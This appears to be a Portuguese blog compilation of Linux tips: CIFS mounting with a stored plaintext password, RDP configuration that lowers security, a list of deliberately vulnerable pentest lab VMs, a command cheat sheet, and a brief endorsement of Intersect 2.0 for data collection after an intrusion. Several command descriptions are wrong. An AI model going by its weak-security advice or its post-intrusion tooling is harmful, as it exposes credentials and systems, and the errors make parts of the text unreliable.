Interop: Compartilhando pasta entre Linux e Windows + Active Directory

O samba é muito para o que eu quero fazer que é compartilhar uma simples pasta e poder realizar copias dos arquivos.

Objetivo: Compartilhar uma pasta no servidor Linux com o Servidor Windows Server + Active Directory.

Primeiramente temos que criar nossa pasta no servidor linux e após isso no servidor Microsoft.

1 – Servidor Linux

# o comando mkdir é usado para criar diretórios, o caminho onde vou montar minha pasta vai ser /mnt/backup_oracle

mkdir /mnt/backup_oracle

aqui tudo ok no Linux.

2 – Servidor Windows Server

Criar a pasta conforme for melhor para você, e compartilhar ela, no meu caso como é um servidor de Backup eu dei somente permissão para o Administrador do Domínio.

Ex: D:\Backup\Oracle_11g\

Diretórios criados agora vamos voltar para o linux e realizar as configurações para montar nosso diretório.

Logado com o usuário root.

# mount -t cifs -0 username=usuário@dominio,password=senha_do_usuário //Ip_Servidor_Windows/Pasta_Compartilhada /mnt/backup_oracle

Vamos a explicação do comando usado para um melhor entendimento.

Mount => comando usado para montar diretórios, partição no linux

-t cifs => tipo de partição a ser montada

-o username => comando alto explicativo, usuário o qual vai ser autenticado e receber as permissões

password => Senha do usuário que vai ser autenticado

//Ip_Servidor_Windows/Pasta_Compartilhada => Ip do Servidor o qual deseja compartilhar a pasta com o Linux.

/mnt/backup_oracle => Pasta do Servidor Linux que vai ser compartilhada com o Windows Server.

Levando em conta que estamos usando autenticação com um servidor Active Directory, se você não tem um servidor de Active Directory no seu Windows Server onde tem o -o username=usuário@dominio, você vai deixar assim -o username=usuário.

Dica: e se o servidor reiniciar? der uma parada de energia?

Vamos colocar a linha que realiza a montagem da pasta no arquivo rc.local.

Com o usuário root.

# vim rc.local

Agora é só copiar a linha do comando depois de testado e compartilhado a pasta, assim toda vez que o servidor Linux for reinicializado ele vai montar a pasta na sua inicialização.

Corrigindo erros ao executar apt-get update

Abra o terminal e abraseu sources.list usando o seguinte comando:

sudo gedit /etc/apt/sources.list

assumindo que vc está usando sua sources.list padrão, você deve ter permissão para modificar o arquivo que abriu e inserir as linhas abaixo:

## MAIN REPOSITORIES
deb http://gb.archive.ubuntu.com/ubuntu/ hardy main restricted universe multiverse

## MAJOR BUG FIX UPDATES produced after the final release
deb http://gb.archive.ubuntu.com/ubuntu/ hardy-updates main restricted universe multiverse

## UBUNTU SECURITY UPDATES
deb http://security.ubuntu.com/ubuntu hardy-security main restricted universe multiverse

## BACKPORTS REPOSITORY
deb http://gb.archive.ubuntu.com/ubuntu/ hardy-backports main restricted universe multiverse

## PROPOSED REPOSITORY
deb http://archive.ubuntu.com/ubuntu hardy-proposed main restricted universe multiverse

Agora salve e feche o arquivo, e faça um refresh da lista executando o seguinte comando:

sudo apt-get update

Montando um laboratorio completo para Pentest

Vou mostrar alguns recursos e distribuições para serem feitos testes de penetração, onde vocês pode usar as técnicas e  ferramentas de exploração em um ambiente totalmente seguro e legal. A maioria das distros são LiveCD e possui inúmeras vulnerabilidades, onde pode ser usadas para ataques de exploração web, enumeração, cracking, forense, engenharia reversa, penetração e etc…

Atualizado em 19/02/2012

WebGoat

WebGoat é uma aplicação web J2EE deliberadamente insegura mantido pela OWASP projetado para ensinar lições de segurança em aplicações web. Em cada aula, os usuários devem demonstrar o seu entendimento de uma questão de segurança, explorando uma vulnerabilidade real na aplicação WebGoat. Por exemplo, em uma das lições que o usuário deve usar a injeção SQL para roubar números de cartão de crédito falso. O aplicativo é um ambiente de ensino realista, proporcionando aos usuários com dicas e códigos para explicar melhor a lição.

http://www.owasp.org/index.php/Category:OWASP_WebGoat_Project

UltimateLAMP

UltimateLAMP é uma máquina virtual rodando Ubuntu contendo serviços vulneráveis ​​e contas fracas.

A VM UltimateLAMP executa os seguintes serviços: Postfix, Apache, MySQL, WordPress, TextPattern, Seredipity, MediaWiki, TikiWiki, PHP, Gallery, Moodle, PHPWebSite, Joomla, eGroupWare, Drupal, Php Bulletin Board, Sugar CRM, Owl, WebCalendar, Dot project, PhpAdsNew, Bugzilla, OsCommerce, ZenCart, PhphMyAdmin, Webmin,Mutillidae 1.5 (OWASP Top 10 Vulns)

http://ronaldbradford.com/tmp/UltimateLAMP-0.2.zip

Holynix

Semelhante ao de-ice Cd’s e pWnOS, holynix é uma imagem vmware do ubuntu server que foi deliberadamente construída para ter falhas de segurança para fins de testes de penetração.Cheio de falhas e de obstáculos, que são encontradas no mundo real.
http://pynstrom.net/holynix.php

WackoPicko

WackoPicko é um site que contém vulnerabilidades conhecidas. Foi usado pela primeira vez para o papel Pentest: Uma Análise da black-bom e Web Vulnerability Scanner.
http://cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf
https://github.com/adamdoupe/WackoPicko

De-ICE PenTest LiveCDs

Os LiveCDs pentest são a criação de Thomas Wilhelm, que foi transferido para uma equipe de teste de penetração na empresa onde trabalhava. Precisando de aprender muito sobre como os testes de penetração tão rapidamente quanto possível, Thomas começou a olhar para ambos os instrumentos e objectivos. Ele encontrou uma série de ferramentas, mas não metas utilizáveis para praticar contra. Eventualmente, em uma tentativa de reduzir o fosso de aprendizagem, Thomas criou cenários pentest usando LiveCDs.
http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Metasploitable

Metasploitable é um Ubuntu 8.04 instalado em um servidor de 6,5 de uma imagem VMWare. Um número de pacotes vulneráveis são incluídas, incluindo uma instalação de Tomcat 5.5 (com credenciais fraca), distcc, tikiwiki, twiki, e um velho mysql.
http://blog.metasploit.com/2010/05/introducing-metasploitable.html

Owaspbwa

Open Web Application Security Project (OWASP) Broken Aplicações Web Project, uma coleção de aplicativos web vulnerável.
http://code.google.com/p/owaspbwa/

Web Security Dojo

Um open-source independente do ambiente de formação para os testes de penetração da Web Application Security. Tools + Targets = Dojo
Diversas ferramentas de segurança de aplicações web e aplicações web de teste vulneráveis foram adicionados a uma instalação limpa do Ubuntu v10.04.1, que é corrigida com as atualizações adequadas e adições VM para fácil utilização.
http://www.mavensecurity.com/web_security_dojo/

Lampsecurity

Formação AMPSecurity é projetado para possuir uma série de vunerabilidade, criada em uma imagens de máquinas virtuais juntamente com a documentação completa, projetado para ensinar Linux, Apache, php, segurança mysql.
http://sourceforge.net/projects/lampsecurity/files/

Damn Vulnerable Web App (DVWA)

Damn Vulnerable Web App é um PHP/MySQL aplicação web, que é totalmente vulneráveis. Seus principais objetivos são para ajudar os profissionais de segurança para testar suas habilidades e ferramentas em um ambiente legal, ajudar os desenvolvedores web a entender melhor os processos de segurança de aplicações web e ajuda os professores / para ensinar alunos / aprender de segurança de aplicativos web em um ambiente de sala de aula.
http://www.dvwa.co.uk/

Hacking-Lab

Este é o Hacking-Lab projeto LiveCD. Ele está atualmente no estagio beta. O Live-CD é um ambiente de cliente padrão para resolver nossos desafios wargame Hacking-Lab do controle remoto.
http://www.hacking-lab.com/hl_livecd/

Moth

Moth é uma imagem do VMware com um conjunto de aplicativos da Web e vulneráveis scripts, que você pode utilizar para:
1. Testing Web Application Security Scanners
2. Testing Static Code Analysis tools (SCA)
3. Giving an introductory course to Web Application Security
http://www.bonsai-sec.com/en/research/moth.php

Damn Vulnerable Linux (DVL)

Damn Vulnerable Linux é uma distribuição Linux toda ruim. Seus desenvolvedores gastaram horas enchendo-o de vulnerabilidades, mal-configuração, desatualização e software exploráveis que o torna vulnerável a ataques. DVL não é feito para correr em sua área de trabalho – é uma ferramenta de aprendizagem para os estudantes de segurança.
http://www.damnvulnerablelinux.org/

pWnOS

pWnOS está em um “VMImage”, que cria uma meta para a prática de testes de penetração, com o “objetivo final” é fazer de raiz. Ele foi projetado para praticar o uso de exploits, com múltiplos pontos de entrada.
http://www.krash.in/bond00/pWnOS%20v1.0.zip

Virtual Hacking Lab

Um mirror deliberadamente de aplicações inseguras e softwares antigos com vulnerabilidades conhecidas. Usado para a prova de conceito / treinamento / segurança afins de aprendizagem. Disponível em imagens virtuais ou iso vivo(liveCD) ou formatos autônomo.
http://sourceforge.net/projects/virtualhacking/files/

BodgeIt Store

A BodgeIt Store é uma aplicação web vulnerável, que é atualmente destinado a pessoas que são novas para pen testing.

http://code.google.com/p/bodgeit/

Badstore

Badstore.net é dedicado a ajudar você a entender como os hackers atacam vulnerabilidades em aplicações Web, e mostrando-lhe como reduzir a sua exposição.
http://www.badstore.net/

Katana

Katana é uma suíte de segurança portátil multi-boot, que reúne muitas das distribuições de hoje, melhor segurança e aplicações portáteis para fugir de um único Flash Drive. Ele inclui as distribuições que focam Pen-Teste, Auditoria, Perícias, recuperação do sistema, análise da rede e remoção de malware. Katana também vem com mais de 100 aplicações portáteis do Windows, tais como Wireshark, Metasploit, NMAP, Cain & Abel, e muitos mais.
http://www.hackfromacave.com/katana.html

Hackademic Challenges

A OWASP Hackademic Desafios, é um projeto open source que pode ser usado para testar e melhorar o conhecimento do sistema de informação e segurança de aplicações web. A OWASP Hackademic tem Desafios implementar em cenários realistas, com vulnerabilidades conhecidas em um ambiente seguro e controlável. Os usuários podem tentar descobrir e explorar essas vulnerabilidades, a fim de aprender conceitos importantes de segurança da informação através da perspectiva do invasor.

http://www.hackademic.eu/

Exploit.co.il Vulnerable Web App

Exploit.co.il Vulnerable Web app concebido como uma plataforma de aprendizagem para testar diferentes técnicas de injeção SQL Este é um site totalmente funcional com um sistema de gerenciamento de conteúdo baseado em fckeditor. Você pode baixá-lo como código fonte ou uma pré-configurado.

http://sourceforge.net/projects/exploitcoilvuln/


Gruyere

Este codelab mostra como vulnerabilidades de aplicativos web podem ser exploradas e como se defender contra esses ataques. A melhor maneira de aprender é fazendo as coisas, então você vai ter a chance de fazer alguns testes de penetração real, na verdade, de exploração de uma aplicação real. Especificamente, você aprenderá o seguinte:
Como uma aplicação pode ser atacado com vulnerabilidades de segurança comum da web, como vulnerabilidades cross-site scripting (XSS) e de falsificação de cross-site pedido (XSRF).
Como encontrar, corrigir e evitar essas vulnerabilidades comuns e outros bichos que têm um impacto de segurança, como a negação de serviço, divulgação de informações ou a execução remota de código.
Para tirar o máximo proveito deste laboratório, você deve ter alguma familiaridade com a forma como funciona uma aplicação web (por exemplo, o conhecimento geral do HTML, templates, cookies, AJAX, etc.)

http://google-gruyere.appspot.com/

Kioptrix

Este Kioptrix VM Imagem são desafios fáceis. O objetivo do jogo é adquirir acesso root via todos os meios possíveis (exceto realmente hackear o servidor VM ou player).
O objetivo destes jogos são para aprender as ferramentas e técnicas básicas de vulnerabilidade, avaliação e exploração. Há maneiras mais de um para completar com sucesso os desafios.

http://www.kioptrix.com/blog/?page_id=135

NETinVM

NETinVM é uma única imagem de máquina virtual VMware que contém, pronto para ser executado, uma série de User-Mode Linux (UML) de máquinas virtuais que, quando iniciado, conformam uma rede de computador inteiro dentro da máquina virtual VMware. Daí NETinVM o nome, um acrônimo para Rede no Virtual Machine. NETinVM foi concebido principalmente como uma ferramenta educacional para ensinar e aprender sobre sistemas operacionais, redes de computadores e segurança do sistema e de rede, mas outros usos são certamente possível.

http://informatica.uv.es/~carlos/docencia/netinvm/

SecuriBench

Stanford SecuriBench é um conjunto de programas da vida real fonte aberto para ser usado como um campo de testes para as ferramentas de segurança dinâmica e estática. Release 0,91 uma foca aplicativos da Web baseados em Java.

Estas aplicações sofrem de uma variedade de vulnerabilidades, incluindo

ataques de injeção SQL
Cross-site scripting ataques
ataques HTTP divisão
ataques Path Traversal

http://suif.stanford.edu/~livshits/securibench/

WebMaven

WebMaven (mais conhecido como Banco Buggy) foi um ambiente de aprendizagem interativa para segurança de aplicações web. É emulado várias falhas de segurança para o usuário a encontrar. Esta usuários habilitados para a prática segura e legal aplicação web técnicas de avaliação de vulnerabilidade. Além disso, os usuários poderiam avaliação comparativa das suas ferramentas de auditoria de segurança para garantir que eles executam como anunciado.

http://www.mavensecurity.com/WebMaven/

OWASP Vicnum Project

A flexibilidade da aplicação web, mostrando as vulnerabilidades como cross site scripting, injeções de SQL, e questões de gestão de sessão. Útil para aperfeiçoar as habilidades de TI auditores de segurança web e criação de “capture the flag”. Jogue o jogo em http://vicnum.ciphertechs.com

https://sourceforge.net/projects/vicnum/


Hackxor

Hackxor é um jogo de hacking webapp onde os jogadores devem localizar e explorar vulnerabilidades para o progresso através da história. Pense WebGoat mas com um enredo e um foco no realismo e dificuldade. Contém XSS, CSRF, SQLI, redos, DOR, injeção de comandos, etc

Fonte: Bhior

Acessando aplicativos via TS através de clientes Linux

Hoje com o aumento da interoperabilidade no mundo empresarial, os desafios estão sendo cada vez maiores. No mundo dos servidores uma das integrações mais feitas é a de servidores de arquivos com autenticação no AD, para que os usuários dos desktops windows possam ver seus arquivos de uma forma transparente, como se tivessem trabalhando em um ambiente homogeneo.

Uma outra crescente também são os desktops linux ingressando nestes ambientes, principalmente em micro e pequenas empresas que não querem gastar com o licenciamento ou não querem entrar no mundo da pirataria, então aderem ao mundo do software livre, porém acabam enfrentando um outro problema, a maioria das aplicações existentes para um mundo corporativo são para ambientes Windows, então como vou usar essas aplicações no meu desktop linux?

 

Para essa pergunta a solução é simples e bem antiga, usar o TS (Terminal Services ou Serviços de Terminal) em um servidor Windows 2003 ou o RDS (Remote Desktop Services ou Serviços de Área de Trabalho Remota) em um servidor Windows Server 2008.

Se o usuário precisa de usar apenas uma aplicação basta definir ela na guia ambiente no perfil do usuário Windows, mas e se caso precisa executar mais de uma essa solução não funciona, para isso existe uma solução simples para o mundo Linux chamada Seamless rdp, mas o que ele faz?

O Seamless é um modo integrado no rdesktop que permite que você execute somente a aplicação Windows que queira, através da linha de comando, para isso basta um parâmetro do lado do comando rdesktop para ele funcionar do lado do cliente, isso será demonstrado mais a frente. Mas e no servidor não é preciso configurar nada? Sim em um servidor 2003 é necessário 3 passos para isso:

1º – Baixe o seguinte arquivo: http://www.cendio.com/seamlessrdp/seamlessrdp.zip
2º – Extraia o arquivo para uma pasta no seu servidor. Ex: C:\seamlessrdp\
3º – Use e Aproveite.

No Windows Server 2008 é necessário duas configurações a mais:
1º – Habilitar o RDS: Conforme o site: https://msmvps.com/blogs/msvirtualization/archive/2011/01/11/instalando-o-remoteapp-server.aspx
Nota: No site fala para habilitar a configuração mais segura, porém como não é uma solução para o mundo Windows habilite a opção: “Allow connections from computers running any version of Remote Desktop (less secure)” (Permitir conexões de computadores executando qualquer versão da Área de Trabalho Remota)
2º – Na configuração do RemoteAPP (Iniciar > Ferramentas Administrativas > Serviços de Área de Remota > Gerenciador do RemoteApp), vá em RD Session Host Server (Servidor de Host da Sessão da Área de Trabalho Remota) e habilite a opção “Allow users to start both listed and unlisted programs on initial connections” (Permitir usuários iniciar ambos aplicativos listados e não listados sobre conexões iniciais)

Com o seu servidor Seamless instalado basta agora basta executar o aplicativo do lado do cliente, para isso, como dito anteriormente, basta adicionar um parâmetro na linha de comando do rdesktop que é a letra A (em maiúsculo) com isso se caso você queira executar a calculadora do Windows digite o seguinte comando no terminal do Linux:

rdesktop -A -s “caminho_do_seamlessrdp.exe_no_seu_servidor calc” “ip_ou_nome_do_servidor_seamlessrdp”

Ex: rdesktop -A -s “C:\seamlessrdp\seamlessrdpshell.exe calc” “192.168.0.1″

Agora o desktop linux já está preparado para executar aplicações Windows, mas como disse anteriormente essa solução só é interessante se o usuário precisa de executar mais de uma aplicação e para automatizar segue um script para facilitar a vida:

#!/bin/bash
echo "1 - VSphere"
echo "2 - Calc"
echo "3 - IE"
read -p "Escolha o Programa:" OPT
case $OPT in
1) rdesktop -A -s "C:\seamlessrdp\seamlessrdpshell.exe C:\Program Files\VMware\Infrastructure\Virtual Infrastructure Client\Launcher\VpxClient.exe" "192.168.0.1";;

2) rdesktop -A -s "C:\seamlessrdp\seamlessrdpshell.exe calc" "192.168.0.1";;

3) rdesktop -A -s "C:\seamlessrdp\seamlessrdpshell.exe C:\Program Files\Internet Explorer\Iexplore.exe" "192.168.0.1";;

*);;
esac

Este script realiza o seguinte
1º – Pede para o usuário digitar o número a qual pertence o programa que quer executar: 1 para o VSphere da VMWare, 2 para a calculadora e 3 para o IE
2º – Armazena o valor na variável OPT
3º – Entra no case e dependendo do valor executa o programa desejado
Nota: Neste exemplo o caminho seamlessrdpshell.exe está na pasta “C:\seamlessrdp” e o servidor tem o endereço 192.168.0.1

Nota: Personalize da maneira que melhor lhe atender.

Pronto, você agora você já tem um ambiente configurado e automatizado para executar aplicações Windows através do Seamlessrdp e aproveitar ao máximo.

PS: Para essa solução é necessário licenças de TS (Windows Server 2003) ou RDS (Windows Server 2008), que o preço é bem inferior ao de uma licença Desktop Windows.
PS2: Para quem gosta do Wine e diz que ele pode executar essa tarefa, uma observação, ele pode fazer isso, mas não com a mesma facilidade e a estabilidade do Seamlessrdp.
PS3: Para quem é do mundo Windows essa solução é semelhante ao RemoteApp do Windows Server 2008.

Fonte:CooperaTi

Principais comandos do terminal no Ubuntu

Para quem mexeu com o sistema operacional mais usado no mundo, ou melhor, Windows, a vida inteira, ao começar a usar o Linux e suas extensões toma alguns sustos e nota que ambos são bem diferentes, não possuem nenhuma ramificação de semelhança. Para começar, não ache que terá todos os joguinhosdo Windows no Linux, pois são arquivos totalmente diferentes, a não ser que use algum emulador ou então o Wine, mas não com a mesma qualidade de um S.O sozinho. Recomendo então para você, que já usa Windows há um tempo, que faça a instalação do Linux em dual-boot, pois caso não se acostume, volte para o windows normalmente. Enfim, vamos ao que interessa.

Aqui, logo abaixo temos alguns comandos básicos do terminal para o Linux, na frente de cada comando, colocarei o que ele faz, e com quais outros ele pode ser ligado, então, mãos à obra!

1. ls (lista o conteúdo de um diretório)
Exemplo: $ ls

2. ls -a (lista os diretórios, arquivos oculto e executáveis)
Exemplo: $ ls -a

3. ls -l (Lista o conteúdo de um diretório detalhadamente)
Exemplo: $ ls -l

4. pwd (mostra o diretório corrente)
Exemplo: $ pwd

5. cd (muda de diretório)
Exemplo: $ cd /etc

6. cd – (volta para o diretório anterior)
Exemplo: $ cd –

7. cd .. (volta um diretório acima)
Exemplo: $ cd ..

8. cd ~ (volta para seu diretório /home)
Exemplo: $ cd ~

9. mkdir [pasta] (cria uma pasta com o nome desejado)
Exemplo: $ mkdir programas

10. mkdir [pasta1] [pasta2] (cria pasta1 e pasta dois ao mesmo tempo)
Exemplo: $ mkdir teste1 teste2

11. mkdir -p [pasta]/[sub-pasta] (cria um diretório e um sub-diretório)
Exemplo: $ mkdir -p teste3/teste3_1

12. rm -r [pasta/arquivo] (deleta uma pasta ou arquivo)
Exemplo: $ rm -r teste3

13. mv [arquivo1] [arquivo2] (renomeia uma pasta)
Exemplo: $ mv teste teste2

14. mv [arquivo] [caminho] (move o arquivo para um determinado caminho)
Exemplo: $ mv imagem. jpg ~/t4k_slack/Wallpapers

15. cp [arquivo] [caminho] (copia um arquivo para um determinado caminho)
Exemplo: $ cp imagem.jpg ~/t4k_slack/Wallpapers

16. ln -s [caminho] [link] (cria um link)
Exemplo: $ ln -s /usr/bin/limewire limewire

17. type [executável] (busca o caminho de um executável)
Exemplo: $ type limewire

18. cat > [arquivo] (cria novo arquivo) Exemplo: $ cat > teste.txt

19. cat [arquivo1] >> [arquivo2] (acrescenta arq.2 em arq.1)
Exemplo: $ cat teste1 >> teste2

20. touch [arquivo] (cria um arquivo)
Exemplo: $ touch teste

21. diff [arquivo1] [arquivo2] (compara os dois arquivos)
Exemplo: $ diff teste1 teste2

22. locate [arquivo] (localiza o arquivo desejado]
Exemplo:$ locate JimiHendrix. jpg

23. head [-linhas] [arquivo] (mostra as primeiras linhas de um arquivo)
Exemplo:$ head -10 texto.txt

23.tail [-linhas] [arquivo] (faz exatamente o contrário do comando anterior)
Exemplo:$ tail -20 texto.txt

24. less [arquivo] (mostra o conteúdo de um diretório)
Exemplo:$ less texto.txt

25. more [arquivo] (mostra o conteúdo de um arquivo)
Exemplo:$ more texto.txt

26. nl [arquivo] (mostra quantas linhas tem no arquivo)
Exemplo:$ nl texto.txt

27. wc [arquivo] (lista número de linhas, palavras e bytes de um arquivo)
Exemplo:$ wc texto.txt

28. [comando1] | [comando2] (conecta dois processos)
Exemplo:$ vi /etc/X11/xorg.conf | more

29. sleep [tempo] && [comando] (executa um comando em um determinado tempo)
Exemplo:$ sleep 2 && pwd

30. echo [mensagem] (exibe uma mensagem em seu shell)
Exemplo:$ echo Olá Big Linux

31. alias [comando/atual] [comando_novo] (muda o nome de um comando)
Exemplo:$ alias dir=ls -l

32. history (lista os últimos 500 comandos que você digitou)
Exemplo:$ history
33. su (muda para o super usuário root, precisa da senha)
Exemplo:$ su, no Big Linux para ter acesso como administrador sem digitar su, digite “sudo su” sem aspas.

34. su [usuário] (muda para outro usuário, também necessita da senha)
Exemplo:$ su fulano

35. shutdown (reinicia o sistema)
Exemplo:$ shutdown

36. reboot (reinicia a máquina com emergência)
Exemplo:$ reboot

37. passwd (troca sua senha)
Exemplo:$ passwd

38. uname (mostra o sistema operacional)
Exemplo:$ uname

39. uname -a (mostra o sistema operacional, nome da máquina, versão do kernel e etc)
Exemplo: $ uname -a

40. dmesg (mostra informações do sistema)
Exemplo: $ dmesg

41. top -d [segundos] (informações detalhadas dos processos)
Exemplo: $ top -d 3

42. ps (mostra os processos corrente “PID”)
Exemplo: $ ps

43. killall [programa] (força o término de um programa)
Exemplo: $ killall xmms

44. xkill (transforma o ponteiro do mouse em um assassino de programa)
Exemplo:$ xkill
45. mkfs.ext2 (formata um disquete em formato Linux)
Exemplo: $ mkfs.ext2 /dev/fd0

46. superformat (formata um disquete em formato DOS)
Exemplo: $ superformat /dev/fd0

47. vmstat [-tempo] (mostra a memória swap em uso)
Exemplo: $ vmstat -2

48. arch (mostra a arquitetura do seu PC)
Exemplo: $ arch

49. lsmod (lista os módulos da sua máquina)
Exemplo: $ lsmod

50. insmod [módulo] (levanta um módulo forçadamente, requer root)
Exemplo: # insmod spca5x

51. adduser (adiciona um usuário no sistema, requer root)
Exemplo:# adduser

52. userdel [usuário] (deleta um usuário, requer root)
Exemplo: # userdel fulano

53. userdel -r [usuário] (deleta o usuário e sua pasta que se encontra no diretório /home,
requer root)
Exemplo: # userdel -r fulano

54. chfn [usuário] (muda informações de um usuário, requer root)
Exemplo: # chfn fulano

55. chage -M [dias] [usuário] (expira um usuário, no dia pré-determinado, requer root)
Exemplo: # chage -M 20 fulano

56. display [imagem.jpg] (mostra uma imagem no X, necessita do ImageMagick)
Exemplo: $ display imagem. jpg

57. convert [imagem.png] [imagem.jpg] (converte o formato .png para . jpg, necessita
também do ImageMagick)
Exemplo: $ convert imagem.png imagem.jpg

58. chmod (altera permissões)
Exemplo: # chmod 666 /dev/hdd

59. mount [device] (monta um dispositivo)
Exemplo: $ mount /mnt/cdrom

60. umount [device] (desmonta um dispositivo)
Exemplo: $ umount /mnt/cdrom

61. eject (abre a gaveta do cd-rom)
Exemplo: $ eject /mnt/cdrom

62. eject -t (fecha a gaveta do cdrom)
Exemplo: $ eject -t /mnt/cdrom

63. halt (desliga o PC)
Exemplo: $ halt

64. date (informa o dia e a hora)
Exemplo: $ date

65. hostname (informa o nome da máquina)
Exemplo: $ hostname

66. du [diretório] (fornece o tamanho de um diretório)
Exemplo: $ du pasta

67. du -S [sub-diretórios] (fornece o tamanho do sub-diretório)
Exemplo: $ du -S sub_pasta

68. [comando] & (inicia um processo em segundo plano e deixa o terminal livre para
trabalhar)
Exemplo: $ gkrellm &

69. cal (mostra um calendário do mês atual)
Exemplo: $ cal

70. cal [ano] (mostra os 12 meses de um determinado ano)
Exemplo: $ cal 2005

71. last [-quantidade] (mostra informações sobre os últimos logins, onde em quantidade
você indica o número de logins)
Exemplo: $ last -10

72. tar -zxvf[arquivo.tar.gz] (descompacta um arquivo em formato .tar.gz)
Exemplo: $ tar -zxvf amsn-0.94.tar.gz

73. tar -jxvf [arquivo .tar.bz2] (descompacta um arquivo no formato .tar.bz2)
Exemplo: $ tar -jxvf gkrellm-0.12.tar.bz2

74. clear (limpa a tela do shell)
Exemplo: $ clear

75. free (mostra detalhes sobre a memória RAM)
Exemplo: $ free

76. time [comando] (mede o tempo gasto para abrir um programa)
Exemplo: $ time amsn

77. uptime (mostra o tempo desde do último boot)
Exemplo: $ uptime

78. lsattr [arquivo/diretório] (lista atributos de um arquivo ou diretório)
Exemplo: $ lsattr arquivo

79. whereis [executável/comando] (localiza o caminho de um executável/comando)
Exemplo: $ whereis amsn

80. who (mostra quem está conectado ao sistema nesse momento)
Exemplo: $ who

81. wget -c [URL] (faz download de arquivo na internet)
Exemplo: $ wget -c http://www.lugar.do.download/

82. whoami (mostra quem se logou primeiro no sistema)
Exemplo: $ whoami
83. lspci(lista os componentes PCI do seu computador)

Exemplo: $ lspci

84. init 6 (faz reiniciar o computador mais rápido)

Exemplo: $ init 6

85. init 0(faz desligar o computador mais rápido)
Exemplo: $ init 0

86. startx (inicia a interface gráfica padrão do sistema)

Exemplo: $ startx

Dicas:

1) Para listar todos os comandos disponiveis num terminal basta apertar TAB duas vezes, o terminal vai pergunta se você quer ver todos os comandos. Display all 3466 possibilities? (y or n)

Então basta aperta y ( yes-sim ) e todos os comandos serão listados, se apertar n ( no-não ) sera cancelado a listagem.
o numero de “possibilities” pode variar.

2) Para saber mais sobre o comando basta adicionar –help na frente exemplo:

wget –help

lspci –help

obs: geralmente os helps são em ingles.

3) O terminal tem sensibilidade com maiúsculas e minúsculas, tudo tem que ser digitado da maneira exata de como é escrito.

Descompactando arquivos no Linux

Quem é usuário Windows esta acostumado com apenas dois formatos de arquivos compactados, zip e rar, em ambos os formatos, é possível descompactar o arquivo utilizando programas como WinRar, mas e quando você esta no Linux, baixa um programa e se depara com formatos como tar, tar.gz, bz2 e tar.bz2?

Veja abaixo uma lista de comandos para descompactar arquivos nos formatos citados acima, através do terminal.

Antes de tudo entre no mesmo diretório em que esta o arquivo compactado, por exemplo, se o seu arquivo esta na área de trabalho entre então na área de trabalho utilizando o comando cd (cd /home/mundodoshackers/”Área de Trabalho”).

Arquivos ZIP

unzip nome_do_arquivo.zip

Arquivos RAR

unrar x nome_do_arquivo.rar

Arquivos TAR

tar -xvf nome_do_arquivo.tar

Arquivos TAR.GZ

tar -vzxf nome_do_arquivo.tar.gz

Arquivos BZ2

bunzip nome_do_arquivo.bz2

Arquivos TAR.BZ2

tar -jxvf nome_do_arquivo.tar.bz2

As distribuições Linux possuem um gerenciador de pacotes, com ele também é possível descompactar alguns tipos de arquivos, por tanto, além de utilizar os comandos acima, você também pode clicar duas vezes no arquivo compactado para ver se ele é aberto com o gerenciador de pacotes.

Se o gerenciador de pacotes conseguir abrir o arquivo, irá aparecer uma tela como essa:

Clique em “Extrair“.

Agora é só escolher o local em que você quer extrair o arquivo e depois clicar em “Extrair“.

No exemplo acima eu utilizei o gerenciador de pacotes da distribuição Linux Ubuntu 11.04.

Fonte:MundoHackers

O que esperar do Ubuntu 12.04

A distribuição Linux mais famosa e usada esta crescendo à cada dia que passa, prova disso é uma estatística simples feita pela CANONICAL, empresa que cuida do financiamento da distribuição (Ubuntu e KUbuntu), que segundo ela, já são 20 milhões de pessoas que usa a distribuição Ubuntu todos os dias, em todos países.

O Ubuntu, desde sua versão 11.04, adotou o Unity como ambiente gráfico padrão, o que chateou muitos usuários. Mas, logo depois, em sua versão 11.10, o Unity deu um grande passo, melhorou (correção de bugs, mais recursos e novidades) e de certa forma, trouxe e atraiu muitos usuários ao Ubuntu. Desde ai o Ubuntu já cresceu de forma notada, um grande passo foi dado pela CANONICAL.

Agora muitos, inclusive eu, estou ansioso para o lançamento final da versão 12.04 do Ubuntu, que virá com uma nova versão do Unity, a 5  e além disso promete novidades e melhoras em vários aspectos do sistema operacional, como o gerenciador de arquivos Nautilus.

[logo do Ubuntu 12.04, na qual significa cascos de um animal chamado Pangolim, já que o nome oficial do Ubuntu 12.04 é Precise Pangolim]

 

Mas agora vai a questão, o que esperar do Ubuntu 12.04? Melhorias? Mudanças? Vamos analisar com base nos vídeos e própria análise de sites que testaram a versão Alpha 2 do Ubuntu 12.04.

O que há de novo no Ubuntu 12.04 Alpha 2

O vídeo acima feito pelo site OMG! Ubuntu, mostra algumas novidades que foram adicionadas na versão “alpha 2″ do 12.04, que por sinal facilita muito a vida de muitos usuários, comparando com as versões anteriores. Note que a Central de Programas do Ubuntu abre mais rápido, diferença de 5,82 segundos.

Tela de login modificada, mantendo o Wallpaper do usuário

Mais uma mudança interessante, dessa vez na tela de login, que por visto, foi alterada, esta mais pratico como nunca, repare que o papel de parede do usuário padrão se mantem na tela de login.

Unity 5.0 rodando no Ubuntu 12.04

O Unity 5 esta bem mais estável do que nunca, mais pratico do que nunca, emfim, melhorando a cada vez mais. Como você pode ver, a praticidade é ótima, como também a personalização, cor do launcher por exemplo, movimentação dos ícones e tudo mais.

O que realmente iremos ter no Ubuntu 12.04, será mais confortabilidade, praticidade e melhoria nas customizações. Como você pode ver, esta mais fácil customiza-lo, ainda porque vem com o CompizConfig Settings Manager, um programa que serve para ajustar, configurar e personalizar o Unity e alguns efeitos do Gnome.

Bom, ainda que tenho a certeza do que falei, é melhor avisar que o texto é feito com base nos vídeos e análises da versão alpha 1 e alpha 2 da versão 12.04, portanto, tenho certeza que a versão final virá com mais surpresas.

O Ubuntu irá lançar lá pelas redondezas de maio, então aguardem por mais novidades!

Fonte: Infomaniaco

 

Coleta de dados após ivandir Servidor Linux

Intersect 2.0 é uma ferramenta para coleta de dados pós invasão bem sucedida de uma máquina Linux. Esta ferramenta, desenvolvida em python, é uma mão na roda para coleta de centenas de dados.

Um vídeo da ferramenta em funcionamento:

Intersect 2.0 Demo from bindshell labs on Vimeo.

 

Nem preciso dizer que o Intersect é mais do que recomendado para aqueles que trabalham com pentest. :)

FontE:CorujaDeTi

Resolvendo problema de driver NVIDIA no Backtrack 5

To install NVIDIA driver, of course, you must disable the Kernel Nouveau. Ok, let’s start it from beginning.

1. Go to NVIDIA website and download the compatible driver for your graphic card series.

